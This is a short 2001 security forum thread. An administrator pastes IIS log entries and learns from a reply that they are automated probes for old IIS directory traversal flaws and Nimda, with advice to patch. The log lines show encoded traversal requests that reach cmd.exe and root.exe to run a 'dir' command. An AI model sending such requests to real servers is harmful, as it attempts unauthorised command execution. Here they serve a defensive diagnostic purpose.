General discussion

Locked

IIS Logs

By Blaine Moore ·
Hi, I have just installed IIS and am looking over the logs. Oftentimes, I see something like the following lines (edited to protect the parties involved):

#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2001-10-30 12:19:49 --.---.---.--- - GET /scripts/root.exe /c+dir 401 -
2001-10-30 12:19:53 --.---.---.--- - GET /MSADC/root.exe /c+dir 401 -
2001-10-30 12:19:56 --.---.---.--- - GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:19:59 --.---.---.--- - GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:02 --.---.---.--- - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:06 --.---.---.--- - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:09 --.---.---.--- - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:12 --.---.---.--- - GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir401 -
2001-10-30 12:20:16 --.---.---.--- - GET /scripts/..?../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:19 --.---.---.--- - GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:26 --.---.---.--- - GET /winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:29 --.---.---.--- - GET /winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:32 --.---.---.--- - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:45 --.---.---.--- - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:21:38 --.---.---.--- - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:21:41 --.---.---.--- - GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -

What is this person doing and is it something I need to be worried about? I have seen multiple people do things of a similar nature over the last 3 days and I'm not quite sure what it means.

This conversation is currently closed to new comments.

3 total posts (Page 1 of 1)  
| Thread display: Collapse - | Expand +

All Comments

Collapse -

IIS Logs

by scottdo10 In reply to IIS Logs

That looks like attempts on older vulnerabilities like IIS DOT DOT Execute and NIMDA tries several different types of attempts. Just make sure your box is up to date with the latest security patches/service packs! You can try to track down where the more frequent attacks come from, but you will always get these tyoes of things.

Collapse -

IIS Logs

by Blaine Moore In reply to IIS Logs

Thanks, I figured it was something of that sort.

Collapse -

IIS Logs

by Blaine Moore In reply to IIS Logs

This question was closed by the author

Back to Security Forum
3 total posts (Page 1 of 1)  

Security Forums